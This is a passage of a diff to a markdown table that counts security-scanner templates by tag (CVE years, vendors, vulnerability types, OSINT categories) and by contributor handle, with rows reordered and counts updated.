adobe | 62 | alph4byt3 | 10 | | | | | | | +| ir | 61 | random_robbie | 10 | | | | | | | +| cve2015 | 59 | co5mos | 10 | | | | | | | +| huntr | 59 | hackergautam | 10 | | | | | | | +| atlassian | 57 | logicalhunter | 10 | | | | | | | +| cve2016 | 57 | fabaff | 9 | | | | | | | +| google | 56 | adamcrosser | 9 | | | | | | | +| vmware | 56 | initstring | 9 | | | | | | | +| enum | 55 | oppsec | 9 | | | | | | | +| c2 | 55 | emadshanab | 9 | | | | | | | +| logs | 48 | olearycrew | 9 | | | | | | | +| tenable | 48 | momika233 | 9 | | | | | | | +| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | +| hackerone | 46 | iamthefrogy | 8 | | | | | | | +| vulhub | 46 | veshraj | 8 | | | | | | | +| aem | 45 | aashiq | 8 | | | | | | | +| osint-gaming | 45 | irshad ahamed | 8 | | | | | | | +| jndi | 44 | that_juan_ | 8 | | | | | | | +| cve2014 | 44 | noraj | 8 | | | | | | | +| php | 44 | zh | 8 | | | | | | | +| debug | 44 | huta0 | 7 | | | | | | | | deserialization | 43 | tarunkoyalwar | 7 | | | | | | | -| cve2024 | 42 | me_dheeraj | 7 | | | | | | | +| plugin | 42 | amit-jd | 7 | | | | | | | +| generic | 42 | caspergn | 7 | | | | | | | +| traversal | 42 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| traversal | 42 | randomstr1ng | 7 | | | | | | | -| plugin | 42 | its0x08 | 7 | | | | | | | -| generic | 42 | techryptic (@tech) | 7 | | | | | | | -| oa | 42 | harshbothra_ | 7 | | | | | | | -| osint-porn | 42 | amit-jd | 7 | | | | | | | -| osint-hobby | 42 | huta0 | 7 | | | | | | | -| springboot | 41 | dr_set | 7 | | | | | | | -| microsoft | 39 | divya_mudgal | 7 | | | | | | | -| cnvd | 39 | nodauf | 7 | | | | | | | -| misc | 39 | caspergn | 7 | | | | | | | -| injection | 38 | kophjager007 | 7 | | | | | | | -| kubernetes | 37 | byt3bl33d3r | 6 | | | | | | | -| jira | 37 | kazgangap | 6 | | | | | | | -| listing | 37 | hahwul | 6 | | | | | | | -| ibm | 36 | gitlab red team | 6 | | | | | | | -| cti | 36 | evan rubinstein | 6 | | | | | | | -| osint-misc | 35 | imnightmaree | 6 | | | | | | | -| sap | 34 | justaacat | 6 | | | | | | | -| ssl | 33 | pentest_swissky | 6 | | | | | | | -| fuzz | 33 | xelkomy | 6 | | | | | | | -| miscellaneous | 32 | megamansec | 6 | | | | | | | -| osint-tech | 31 | clem9669 | 6 | | | | | | | -| tls | 30 | __fazal | 6 | | | | | | | -| osint-coding | 30 | forgedhallpass | 6 | | | | | | | -| ec2 | 30 | devang-solanki | 6 | | | | | | | +| osint-porn | 42 | its0x08 | 7 | | | | | | | +| osint-hobby | 42 | kophjager007 | 7 | | | | | | | +| oa | 42 | techryptic (@tech) | 7 | | | | | | | +| springboot | 41 | randomstr1ng | 7 | | | | | | | +| misc | 39 | dr_set | 7 | | | | | | | +| cnvd | 39 | harshbothra_ | 7 | | | | | | | +| microsoft | 38 | divya_mudgal | 7 | | | | | | | +| injection | 38 | leovalcante | 7 | | | | | | | +| jira | 37 | nodauf | 7 | | | | | | | +| listing | 37 | gitlab red team | 6 | | | | | | | +| kubernetes | 37 | __fazal | 6 | | | | | | | +| cti | 36 | clem9669 | 6 | | | | | | | +| ibm | 36 | evan rubinstein | 6 | | | | | | | +| osint-misc | 35 | justaacat | 6 | | | | | | | +| sap | 34 | ja1sh | 6 | | | | | | | +| ssl | 33 | megamansec | 6 | | | | | | | +| fuzz | 33 | imnightmaree | 6 | | | | | | | +| miscellaneous | 32 | byt3bl33d3r | 6 | | | | | | | +| osint-tech | 31 | pentest_swissky | 6 | | | | | | | +| ec2 | 30 | xelkomy | 6 | | | | | | | +| tls | 30 | praetorian-thendrickson | 6 | | | | | | | +| osint-coding | 30 | pathtaga | 6 | | | | | | | | dlink | 29 | puzzlepeaches | 6 | | | | | | | -| gitlab | 28 | praetorian-thendrickson | 6 | | | | | | | -| k8s | 28 | ja1sh | 6 | | | | | | | -| api | 28 | pathtaga | 6 | | | | | | | -| wp-theme | 28 | mr-xn | 5 | | | | | | | -| ssh | 28 | kh4sh3i | 5 | | | | | | | -| bestwebsoft | 27 | vicrack | 5 | | | | | | | -| fortinet | 27 | s0obi | 5 | | | | | | | -| cve2012 | 26 | shine | 5 | | | | | | | -| citrix | 26 | panch0r3d | 5 | | | | | | | -| manageengine | 25 | defr0ggy | 5 | | | | | | | -| proxy | 25 | podalirius | 5 | | | | | | | -| firewall | 25 | arm!tage | 5 | | | | | | | -| weaver | 25 | gtrrnr | 5 | | | | | | | -| zohocorp | 25 | r12w4n | 5 | | | | | | | -| lfr | 24 | your3cho | 5 | | | | | | | -| admin | 24 | andreluna | 5 | | | | | | | -| osint-images | 24 | r3naissance | 5 | | | | | | | -| dns | 24 | joanbono | 5 | | | | | | | -| osint-business | 24 | ganofins | 5 | | | | | | | -| zoho | 24 | yanyun | 5 | | | | | | | -| osint-finance | 24 | robotshell | 5 | | | | | | | -| osint-shopping | 24 | lucky0x0d | 5 | | | | | | | -| audit | 23 | powerexploit | 5 | | | | | | | -| tomcat | 23 | prajiteshsingh | 5 | | | | | | | -| yonyou | 23 | xxcdd | 4 | | | | | | | -| stored-xss | 23 | m4lwhere | 4 | | | | | | | -| xxe | 23 | iamnooob | 4 | | | | | | | -| s3 | 22 | scent2d | 4 | | | | | | | -| cicd | 22 | pulsesecurity.co.nz | 4 | | | | | | | -| ecology | 21 | nybble04 | 4 | | | | | | | -| msf | 21 | e_schultze_ | 4 | | | | | | | -| weblogic | 21 | 0xr2r | 4 | | | | | | | +| wp-theme | 29 | hahwul | 6 | | | | | | | +| gitlab | 28 | devang-solanki | 6 | | | | | | | +| api | 28 | forgedhallpass | 6 | | | | | | | +| ssh | 28 | shine | 5 | | | | | | | +| k8s | 28 | ganofins | 5 | | | | | | | +| bestwebsoft | 27 | andreluna | 5 | | | | | | | +| fortinet | 27 | defr0ggy | 5 | | | | | | | +| citrix | 27 | your3cho | 5 | | | | | | | +| proxy | 26 | s0obi | 5 | | | | | | | +| cve2012 | 26 | panch0r3d | 5 | | | | | | | +| lfr | 25 | lucky0x0d | 5 | | | | | | | +| firewall | 25 | gtrrnr | 5 | | | | | | | +| manageengine | 25 | podalirius | 5 | | | | | | | +| weaver | 25 | r3naissance | 5 | | | | | | | +| zohocorp | 25 | vicrack | 5 | | | | | | | +| osint-images | 24 | prajiteshsingh | 5 | | | | | | | +| osint-business | 24 | robotshell | 5 | | | | | | | +| dns | 24 | powerexploit | 5 | | | | | | | +| admin | 24 | joanbono | 5 | | | | | | | +| osint-finance | 24 | yanyun | 5 | | | | | | | +| osint-shopping | 24 | mr-xn | 5 | | | | | | | +| zoho | 24 | kh4sh3i | 5 | | | | | | | +| yonyou | 23 | arm!tage | 5 | | | | | | | +| tomcat | 23 | r12w4n | 5 | | | | | | | +| xxe | 23 | 3th1c_yuk1 | 4 | | | | | | | +| audit | 23 | jpg0mez | 4 | | | | | | | +| stored-xss | 23 | h1ei1 | 4 | | | | | | | +| file-upload | 23 | pulsesecurity.co.nz | 4 | | | | | | | +| prestashop | 22 | wisnupramoedya | 4 | | | | | | | +| cicd | 22 | cookiehanhoan | 4 | | | | | | | +| s3 | 22 | shankar acharya | 4 | | | | | | | +| msf | 21 | heeress | 4 | | | | | | | +| github | 21 | nybble04 | 4 | | | | | | | | printer | 21 | ggranjus | 4 | | | | | | | -| dast | 21 | ice3man543 | 4 | | | | | | | -| file-upload | 21 | cookiehanhoan | 4 | | | | | | | -| github | 21 | jpg0mez | 4 | | | | | | | -| camera | 20 | shankar acharya | 4 | | | | | | | -| jenkins | 20 | lum8rjack | 4 | | | | | | | -| rukovoditel | 19 | wisnupramoedya | 4 | | | | | | | -| hp | 19 | k0pak4 | 4 | | | | | | | -| ftp | 19 | h1ei1 | 4 | | | | | | | -| grafana | 19 | incogbyte | 4 | | | | | | | -| struts | 19 | dolev farhi | 4 | | | | | | | -| wavlink | 19 | 3th1c_yuk1 | 4 | | | | | | | -| coldfusion | 18 | heeress | 4 | | | | | | | +| ecology | 21 | dolev farhi | 4 | | | | | | | +| weblogic | 21 | incogbyte | 4 | | | | | | | +| dast | 21 | dadevel | 4 | | | | | | | +| jenkins | 20 | k0pak4 | 4 | | | | | | | +| camera | 20 | e_schultze_ | 4 | | | | | | | +| hp | 19 | scent2d | 4 | | | | | | | +| grafana | 19 | 0xr2r | 4 | | | | | | | +| struts | 19 | xxcdd | 4 | | | | | | | +| wavlink | 19 | ice3man543 | 4 | | | | | | | +| rukovoditel | 19 | m4lwhere | 4 | | | | | | | +| ftp | 19 | lum8rjack | 4 | | | | | | | +| cve2011 | 18 | iamnooob | 4 | | | | | | | +| android | 18 | king-alexander | 4 | | | | | | | | osint-music | 18 | tanq16 | 4 | | | | | | | -| cve2011 | 18 | king-alexander | 4 | | | | | | | -| android | 18 | dadevel | 4 | | | | | | | -| prestashop | 18 | ekrause | 3 | | | | | | | -| ruijie | 18 | fyoorer | 3 | | | | | | | -| confluence | 17 | fxploit | 3 | | | | | | | -| azure | 17 | salts | 3 | | | | | | | -| node.js | 17 | true13 | 3 | | | | | | | -| nginx | 17 | badboycxcc | 3 | | | | | | | -| service | 17 | mavericknerd | 3 | | | | | | | -| cve2009 | 16 | lucasljm2001 | 3 | | | | | | | -| honeypot | 16 | 0w4ys | 3 | | | | | | | -| rconfig | 16 | atomiczsec | 3 | | | | | | | -| status | 16 | dr0pd34d | 3 | | | | | | | -| backup | 16 | vsh00t | 3 | | | | | | | -| vpn | 16 | impramodsargar | 3 | | | | | | | -| mail | 16 | ambassify | 3 | | | | | | | -| osint-blog | 16 | davidmckennirey | 3 | | | | | | | -| alibaba | 16 | _generic_human_ | 3 | | | | | | | -| microweber | 16 | bernardofsr | 3 | | | | | | | -| jarm | 16 | coldfish | 3 | | | | | | | -| ruby | 15 | sushantkamble | 3 | | | | | | | -| backdoor | 15 | e1a | 3 | | | | | | | -| cve2008 | 15 | yuzhe-zhang-0 | 3 | | | | | | | -| cve2013 | 15 | evergreencartoons | 3 | | | | | | | -| magento | 15 | shifacyclewala | 3 | | | | | | | -| tongda | 15 | binaryfigments | 3 | | | | | | | -| cnvd2021 | 15 | alifathi-h1 | 3 | | | | | | | -| seeyon | 15 | f1tz | 3 | | | | | | | -| java | 15 | ph33r | 3 | | | | | | | -| nodejs | 15 | andydoering | 3 | | | | | | | -| woocommerce | 15 | emenalf | 3 | | | | | | | -| dashboard | 15 | randomrobbie | 3 | | | | | | | -| zyxel | 15 | matt galligan | 3 | | | | | | | -| bypass | 15 | jarijaas | 3 | | | | | | | -| creds-stuffing | 14 | aringo | 3 | | | | | | | -| headless | 14 | thomas_from_offensity | 3 | | | | | | | -| nagios | 14 | farish | 3 | | | | | | | -| domainmod | 14 | z3bd | 3 | | | | | | | -| redis | 14 | j3ssie | 3 | | | | | | | -| osint-health | 14 | taielab | 3 | | | | | | | -| auth | 14 | splint3r7 | 3 | | | | | | | -| rds | 14 | imjust0 | 3 | | | | | | | -| node | 14 | isacaya | 3 | | | | | | | -| osint-art | 14 | swissky | 3 | | | | | | | -| jboss | 14 | skeltavik | 3 | | | | | | | -| windows | 14 | yash anand @yashanand155 | 3 | | | | | | | -| smtp | 14 | vagnerd | 3 | | | | | | | +| ruijie | 18 | _generic_human_ | 3 | | | | | | | +| coldfusion | 18 | vsh00t | 3 | | | | | | | +| confluence | 17 | canberbamber | 3 | | | | | | | +| service | 17 | sushantkamble | 3 | | | | | | | +| mail | 17 | ambassify | 3 | | | | | | | +| nginx | 17 | skeltavik | 3 | | | | | | | +| azure | 17 | atomiczsec | 3 | | | | | | | +| node.js | 17 | c4sper0 | 3 | | | | | | | +| backup | 16 | splint3r7 | 3 | | | | | | | +| honeypot | 16 | me9187 | 3 | | | | | | | +| magento | 16 | yuzhe-zhang-0 | 3 | | | | | | | +| vpn | 16 | fxploit | 3 | | | | | | | +| status | 16 | thomas_from_offensity | 3 | | | | | | | +| osint-blog | 16 | binaryfigments | 3 | | | | | | | +| microweber | 16 | farish | 3 | | | | | | | +| alibaba | 16 | xianke | 3 | | | | | | | +| jarm | 16 | alifathi-h1 | 3 | | | | | | | +| cve2009 | 16 | fyoorer | 3 | | | | | | | +| rconfig | 16 | lark-lab | 3 | | | | | | | +| bypass | 15 | salts | 3 | | | | | | | +| zyxel | 15 | aringo | 3 | | | | | | | +| nodejs | 15 | 0w4ys | 3 | | | | | | | +| seeyon | 15 | davidmckennirey | 3 | | | | | | | +| cve2008 | 15 | andydoering | 3 | | | | | | | +| dashboard | 15 | flx | 3 | | | | | | | +| java | 15 | bernardofsr | 3 | | | | | | | +| cve2013 | 15 | badboycxcc | 3 | | | | | | | +| cnvd2021 | 15 | userdehghani | 3 | | | | | | | +| backdoor | 15 | impramodsargar | 3 | | | | | | | +| ruby | 15 | whoever | 3 | | | | | | | +| tongda | 15 | matt galligan | 3 | | | | | | | +| woocommerce | 15 | randomrobbie | 3 | | | | | | | +| setup | 14 | true13 | 3 | | | | | | | +| osint-art | 14 | isacaya | 3 | | | | | | | +| login-check | 14 | arcc | 3 | | | | | | | +| ssti | 14 | e1a | 3 | | | | | | | +| windows | 14 | ph33r | 3 | | | | | | | +| creds-stuffing | 14 | imjust0 | 3 | | | | | | | +| auth | 14 | dr0pd34d | 3 | | | | | | | +| dell | 14 | f1tz | 3 | | | | | | | +| redhat | 14 | mavericknerd | 3 | | | | | | | +| osint-health | 14 | lucasljm2001 | 3 | | | | | | | +| git | 14 | taielab | 3 | | | | | | | | icewarp | 14 | unstabl3 | 3 | | | | | | | -| setup | 14 | cheesymoon | 3 | | | | | | | -| npm | 14 | xianke | 3 | | | | | | | -| dell | 14 | arcc | 3 | | | | | | | -| redhat | 14 | johnjhacking | 3 | | | | | | | -| docker | 14 | me9187 | 3 | | | | | | | -| smb | 14 | parth | 3 | | | | | | | -| login-check | 14 | huowuzhao | 3 | | | | | | | -| cuppacms | 13 | whoever | 3 | | | | | | | -| mysql | 13 | lark-lab | 3 | | | | | | | -| osint-political | 13 | canberbamber | 3 | | | | | | | -| ssti | 13 | flx | 3 | | | | | | | -| airflow | 13 | dudez | 3 | | | | | | | -| git | 13 | bsysop | 2 | | | | | | | -| osint-dating | 13 | 666asd | 2 | | | | | | | -| abstractapi | 13 | manas_harsh | 2 | | | | | | | -| netgear | 13 | nuk3s3c | 2 | | | | | | | -| sonicwall | 13 | d4vy | 2 | | | | | | | -| laravel | 13 | thardt-praetorian | 2 | | | | | | | -| fortigate | 13 | c4sper0 | 2 | | | | | | | -| cuppa | 13 | w4cky_ | 2 | | | | | | | -| postgresql | 13 | usdag | 2 | | | | | | | -| rails | 13 | sinkettu | 2 | | | | | | | -| ivanti | 13 | amsda | 2 | | | | | | | -| graphql | 13 | arliya | 2 | | | | | | | -| hashicorp | 13 | koti2 | 2 | | | | | | | -| drupal | 12 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| doppler | 12 | cocxanh | 2 | | | | | | | -| kafka | 12 | supr4s | 2 | | | | | | | -| webserver | 12 | pbuff07 | 2 | | | | | | | -| ofbiz | 12 | codexlynx | 2 | | | | | | | -| newrelic | 12 | y4er | 2 | | | | | | | -| zimbra | 12 | 0xnirvana | 2 | | | | | | | -| moosocial | 12 | florianmaak | 2 | | | | | | | -| netsweeper | 12 | raesene | 2 | | | | | | | -| iis | 11 | kre80r | 2 | | | | | | | -| iam | 11 | ayadim | 2 | | | | | | | -| phpgurukul | 11 | pxmme1337 | 2 | | | | | | | -| jetbrains | 11 | msegoviag | 2 | | | | | | | -| cache | 11 | gevakun | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | paperpen | 2 | | | | | | | -| vbulletin | 11 | joshua rogers | 2 | | | | | | | -| spring | 11 | cckuakilong | 2 | | | | | | | -| online-fire-reporting | 11 | ehsahil | 2 | | | | | | | -| django | 11 | ree4pwn | 2 | | | | | | | -| jolokia | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | -| osint-video | 11 | kishore-hariram | 2 | | | | | | | -| xstream | 11 | supras | 2 | | | | | | | -| fastjson | 11 | mzack9999 | 2 | | | | | | | -| phpmyadmin | 11 | 0xsapra | 2 | | | | | | | -| prometheus | 11 | k11h-de | 2 | | | | | | | -| dedecms | 10 | danmcinerney | 2 | | | | | | | -| sitecore | 10 | uomogrande | 2 | | | | | | | -| elasticsearch | 10 | charles d. | 2 | | | | | | | -| hikvision | 10 | sbani | 2 | | | | | | | -| info-leak | 10 | 0xrudra | 2 | | | | | | | -| glpi | 10 | redteambrasil | 2 | | | | | | | -| solarview | 10 | x1m_martijn | 2 | | | | | | | -| thinkphp | 10 | bing0o | 2 | | | | | | | -| symfony | 10 | wa1tf0rme | 2 | | | | | | | -| db | 10 | nvn1729 | 2 | | | | | | | -| installer | 10 | mrharshvardhan | 2 | | | | | | | -| solr | 10 | luci | 2 | | | | | | | -| dropbox | 10 | thevillagehacker | 2 | | | | | | | -| xstream_project | 10 | myztique | 2 | | | | | | | -| digitalocean | 10 | dogancanbakir | 2 | | | | | | | -| zabbix | 10 | hetroublemakr | 2 | | | | | | | -| samsung | 10 | joeldeleep | 2 | | | | | | | -| opencats | 9 | h0j3n | 2 | | | | | | | -| sophos | 9 | ep1csage | 2 | | | | | | | -| elastic | 9 | nkxxkn | 2 | | | | | | | -| bitbucket | 9 | geekby | 2 | | | | | | | -| dahua | 9 | g4l1t0 | 2 | | | | | | | -| scada | 9 | foulenzer | 2 | | | | | | | -| cloudtrail | 9 | zomsop82 | 2 | | | | | | | -| versa | 9 | mohammedsaneem | 2 | | | | | | | -| druid | 9 | v0idc0de | 2 | | | | | | | -| wso2 | 9 | dbrwsky | 2 | | | | | | | -| kube | 9 | ajaysenr | 2 | | | | | | | -| moodle | 9 | socketz | 2 | | | | | | | -| firebase | 9 | rafaelwdornelas | 2 | | | | | | | -| vcenter | 9 | christianpoeschl | 2 | | | | | | | -| crlf | 9 | 6mile | 2 | | | | | | | -| progress | 9 | paradessia | 2 | | | | | | | -| facebook | 9 | 8arthur | 2 | | | | | | | -| cnvd2020 | 9 | randomdhiraj | 2 | | | | | | | -| pfsense | 9 | gal nagli | 2 | | | | | | | -| artica | 9 | n-thumann | 2 | | | | | | | -| secret | 9 | z0ne | 2 | | | | | | | -| blind | 9 | clarkvoss | 2 | | | | | | | -| sangfor | 9 | github.com/its0x08 | 2 | | | | | | | -| exchange | 9 | brucelsone | 2 | | | | | | | -| gitea | 9 | korteke | 2 | | | | | | | -| lucee | 9 | herry | 2 | | | | | | | -| python | 9 | davidegirardi | 2 | | | | | | | -| atom | 8 | notnotnotveg | 2 | | | | | | | -| mlflow | 8 | zy9ard3 | 2 | | | | | | | -| unauthenticated | 8 | bmcel | 2 | | | | | | | -| osint-news | 8 | moritz nentwig | 2 | | | | | | | -| recon | 8 | 0xcrypto | 2 | | | | | | | -| emerge | 8 | parzival | 2 | | | | | | | -| oauth | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| console | 8 | sascha brendel | 2 | | | | | | | +| nagios | 14 | dudez | 3 | | | | | | | +| domainmod | 14 | vagnerd | 3 | | | | | | | +| jboss | 14 | shifacyclewala | 3 | | | | | | | +| docker | 14 | jarijaas | 3 | | | | | | | +| redis | 14 | parth | 3 | | | | | | | +| headless | 14 | ekrause | 3 | | | | | | | +| node | 14 | j3ssie | 3 | | | | | | | +| npm | 14 | cheesymoon | 3 | | | | | | | +| smtp | 14 | emenalf | 3 | | | | | | | +| rds | 14 | huowuzhao | 3 | | | | | | | +| smb | 14 | z3bd | 3 | | | | | | | +| mysql | 13 | coldfish | 3 | | | | | | | +| cuppa | 13 | evergreencartoons | 3 | | | | | | | +| airflow | 13 | johnjhacking | 3 | | | | | | | +| postgresql | 13 | swissky | 3 | | | | | | | +| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | +| fortigate | 13 | k11h-de | 2 | | | | | | | +| laravel | 13 | thabisocn | 2 | | | | | | | +| graphql | 13 | sascha brendel | 2 | | | | | | | +| osint-dating | 13 | mrharshvardhan | 2 | | | | | | | +| rails | 13 | myztique | 2 | | | | | | | +| sonicwall | 13 | joshlarsen | 2 | | | | | | | +| moosocial | 13 | h0j3n | 2 | | | | | | | +| netgear | 13 | korteke | 2 | | | | | | | +| cuppacms | 13 | w4cky_ | 2 | | | | | | | +| hashicorp | 13 | raesene | 2 | | | | | | | +| osint-political | 13 | amsda | 2 | | | | | | | +| ivanti | 13 | parzival | 2 | | | | | | | +| drupal | 12 | thezakman | 2 | | | | | | | +| zimbra | 12 | joshua rogers | 2 | | | | | | | +| kafka | 12 | paperpen | 2 | | | | | | | +| netsweeper | 12 | cocxanh | 2 | | | | | | | +| webserver | 12 | bananabr | 2 | | | | | | | +| vbulletin | 12 | dahse89 | 2 | | | | | | | +| newrelic | 12 | michal mikolas (nanuqcz) | 2 | | | | | | | +| ofbiz | 12 | g4l1t0 | 2 | | | | | | | +| doppler | 12 | mzack9999 | 2 | | | | | | | +| cache | 11 | brucelsone | 2 | | | | | | | +| prometheus | 11 | ree4pwn | 2 | | | | | | | +| info-leak | 11 | udit_thakkur | 2 | | | | | | | +| jetbrains | 11 | 6mile | 2 | | | | | | | +| hikvision | 11 | christianpoeschl | 2 | | | | | | | +| django | 11 | paradessia | 2 | | | | | | | +| spring | 11 | danmcinerney | 2 | | | | | | | +| xstream | 11 | arliya | 2 | | | | | | | +| online-fire-reporting | 11 | geekby | 2 | | | | | | | +| iam | 11 | notnotnotveg | 2 | | | | | | | +| iis | 11 | shankaracharya | 2 | | | | | | | +| phpgurukul | 11 | thevillagehacker | 2 | | | | | | | +| jolokia | 11 | bing0o | 2 | | | | | | | +| fastjson | 11 | gal nagli | 2 | | | | | | | +| osint-video | 11 | thardt-praetorian | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| phpmyadmin | 11 | shelled | 2 | | | | | | | +| installer | 11 | sbani | 2 | | | | | | | +| dedecms | 10 | v0idc0de | 2 | | | | | | | +| samsung | 10 | herry | 2 | | | | | | | +| solr | 10 | github.com/its0x08 | 2 | | | | | | | +| db | 10 | wa1tf0rme | 2 | | | | | | | +| elasticsearch | 10 | bsysop | 2 | | | | | | | +| solarview | 10 | pxmme1337 | 2 | | | | | | | +| digitalocean | 10 | d4vy | 2 | | | | | | | +| sitecore | 10 | randomdhiraj | 2 | | | | | | | +| symfony | 10 | foulenzer | 2 | | | | | | | +| glpi | 10 | 666asd | 2 | | | | | | | +| thinkphp | 10 | joeldeleep | 2 | | | | | | | +| zabbix | 10 | lotusdll | 2 | | | | | | | +| xstream_project | 10 | zy9ard3 | 2 | | | | | | | +| dropbox | 10 | koti2 | 2 | | | | | | | +| firebase | 9 | dogancanbakir | 2 | | | | | | | +| opencats | 9 | 0xnirvana | 2 | | | | | | | +| elastic | 9 | 0xsapra | 2 | | | | | | | +| scada | 9 | 0xrudra | 2 | | | | | | | +| secret | 9 | kiblyn11 | 2 | | | | | | | +| exchange | 9 | usdag | 2 | | | | | | | +| sangfor | 9 | supr4s | 2 | | | | | | | +| artica | 9 | charles d. | 2 | | | | | | | +| lucee | 9 | c3l3si4n | 2 | | | | | | | +| python | 9 | bmcel | 2 | | | | | | | +| gitea | 9 | hetroublemakr | 2 | | | | | | | +| dahua | 9 | x1m_martijn | 2 | | | | | | | +| druid | 9 | brenocss | 2 | | | | | | | +| wso2 | 9 | martincodes-de | 2 | | | | | | | +| pfsense | 9 | danielmofer | 2 | | | | | | | +| vcenter | 9 | 0xsmiley | 2 | | | | | | | +| versa | 9 | sinkettu | 2 | | | | | | | +| sophos | 9 | zomsop82 | 2 | | | | | | | +| cloudtrail | 9 | streetofhackerr007 | 2 | | | | | | | +| progress | 9 | y4er | 2 | | | | | | | +| facebook | 9 | afaq | 2 | | | | | | | +| blind | 9 | florianmaak | 2 | | | | | | | +| cnvd2020 | 9 | sy3omda | 2 | | | | | | | +| moodle | 9 | kishore-hariram | 2 | | | | | | | +| crlf | 9 | bp0lr | 2 | | | | | | | +| kube | 9 | pbuff07 | 2 | | | | | | | +| bitbucket | 9 | lstatro | 2 | | | | | | | +| e-office | 8 | kre80r | 2 | | | | | | | +| ognl | 8 | redteambrasil | 2 | | | | | | | +| hms | 8 | ajaysenr | 2 | | | | | | | +| phpjabbers | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| spotweb | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| phpinfo | 8 | vavkamil | 2 | | | | | | | +| gateway | 8 | 0xcrypto | 2 | | | | | | | +| discord | 8 | supras | 2 | | | | | | | +| recon | 8 | cckuakilong | 2 | | | | | | | +| odoo | 8 | t3l3machus | 2 | | | | | | | +| console | 8 | ehsahil | 2 | | | | | | | +| mlflow | 8 | nvn1729 | 2 | | | | | | | +| bucket | 8 | nkxxkn | 2 | | | | | | | +| cloud-enum | 8 | convisoappsec | 2 | | | | | | | +| config-audit | 8 | codexlynx | 2 | | | | | | | +| manager | 8 | mohammedsaneem | 2 | | | | | | | | spotweb_project | 8 | dheerajmadhukar | 2 | | | | | | | -| wanhu | 8 | streetofhackerr007 | 2 | | | | | | | -| e-office | 8 | sy3omda | 2 | | | | | | | -| odoo | 8 | bananabr | 2 | | | | | | | -| go | 8 | shankaracharya | 2 | | | | | | | -| default-page | 8 | brenocss | 2 | | | | | | | -| ognl | 8 | 0xsmiley | 2 | | | | | | | -| symantec | 8 | bp0lr | 2 | | | | | | | -| bucket | 8 | thezakman | 2 | | | | | | | -| config-audit | 8 | vavkamil | 2 | | | | | | | -| huawei | 8 | udit_thakkur | 2 | | | | | | | -| cisco-switch | 8 | afaq | 2 | | | | | | | -| spotweb | 8 | lotusdll | 2 | | | | | | | -| hms | 8 | danielmofer | 2 | | | | | | | -| manager | 8 | liwermor | 2 | | | | | | | -| metadata | 8 | israel comazzetto dos reis | 2 | | | | | | | -| cloud-enum | 8 | joshlarsen | 2 | | | | | | | -| phpjabbers | 8 | convisoappsec | 2 | | | | | | | -| phpinfo | 8 | martincodes-de | 2 | | | | | | | -| error | 8 | maximus decimus | 2 | | | | | | | -| mirai | 8 | shelled | 2 | | | | | | | -| discord | 8 | kiblyn11 | 2 | | | | | | | -| nacos | 7 | ricardo maia (brainfork) | 2 | | | | | | | -| car_rental_management_system_project | 7 | 0xelkomy | 2 | | | | | | | -| fortios | 7 | thabisocn | 2 | | | | | | | -| linkedin | 7 | dahse89 | 2 | | | | | | | -| telesquare | 7 | c3l3si4n | 2 | | | | | | | -| ruckus | 7 | hackerarpan | 2 | | | | | | | -| exploitdb | 7 | hateshape | 1 | | | | | | | -| opensis | 7 | yavolo | 1 | | | | | | | -| pmb | 7 | mchklt | 1 | | | | | | | -| vms | 7 | jc175 | 1 | | | | | | | -| avtech | 7 | duty_1g | 1 | | | | | | | -| instrusive | 7 | jonathanwalker | 1 | | | | | | | -| nexus | 7 | exploitation | 1 | | | | | | | -| websphere | 7 | pjborah | 1 | | | | | | | -| monstra | 7 | houdinis | 1 | | | | | | | -| maps | 7 | stupidfish | 1 | | | | | | | -| cacti | 7 | philippdelteil | 1 | | | | | | | -| gogs | 7 | elmahdi | 1 | | | | | | | -| filemanager | 7 | jiheon-dev | 1 | | | | | | | -| squirrelmail | 7 | joaonevess | 1 | | | | | | | -| contec | 7 | domenicoveneziano | 1 | | | | | | | -| keking | 7 | samuelsamuelsamuel | 1 | | | | | | | -| rfi | 7 | hexcat | 1 | | | | | | | -| activemq | 7 | fmunozs | 1 | | | | | | | -| bigip | 7 | fpatrik | 1 | | | | | | | -| solarwinds | 7 | mr.bobo hp | 1 | | | | | | | -| fpd | 7 | shifacyclewla | 1 | | | | | | | -| nortekcontrol | 7 | bibeksapkota (sar00n) | 1 | | | | | | | -| vpc | 7 | mah3sec_ | 1 | | | | | | | -| twitter | 7 | wabafet | 1 | | | | | | | -| database | 7 | zinminphy0 | 1 | | | | | | | -| landray | 7 | yusakie | 1 | | | | | | | -| joomla\! | 7 | bughuntersurya | 1 | | | | | | | -| moodating | 7 | hanlaomo | 1 | | | | | | | -| oos | 7 | aceseven (digisec360) | 1 | | | | | | | -| mobileiron | 7 | narluin | 1 | | | | | | | -| f5 | 7 | none | 1 | | | | | | | -| bloofox | 7 | pepitoh | 1 | | | | | | | -| slack | 7 | r3s ost | 1 | | | | | | | -| nagiosxi | 7 | qianbenhyu | 1 | | | | | | | -| shopify | 7 | mrcl0wnlab | 1 | | | | | | | -| blockchain | 7 | apt-mirror | 1 | | | | | | | -| mongodb | 7 | f0xy | 1 | | | | | | | -| couchdb | 6 | remi gascou (podalirius) | 1 | | | | | | | -| doctor_appointment_system_project | 6 | rotembar | 1 | | | | | | | -| magmi | 6 | 0xkayala | 1 | | | | | | | -| synacor | 6 | yuansec | 1 | | | | | | | -| doctor-appointment-system | 6 | hardik-rathod | 1 | | | | | | | -| log | 6 | ramkrishna sawant | 1 | | | | | | | -| 74cms | 6 | ofjaaah | 1 | | | | | | | -| elfinder | 6 | wlayzz | 1 | | | | | | | -| cobbler | 6 | rivalsec | 1 | | | | | | | -| webmin | 6 | lixts | 1 | | | | | | | -| typo3 | 6 | erikowen | 1 | | | | | | | -| jetty | 6 | youngpope | 1 | | | | | | | -| asp | 6 | tim_koopmans | 1 | | | | | | | -| jeecg | 6 | therealtoastycat | 1 | | | | | | | -| openvpn | 6 | alperenkesk | 1 | | | | | | | -| geoserver | 6 | lstatro | 1 | | | | | | | -| plesk | 6 | geraldino2 | 1 | | | | | | | -| teamcity | 6 | nerrorsec | 1 | | | | | | | -| gcp 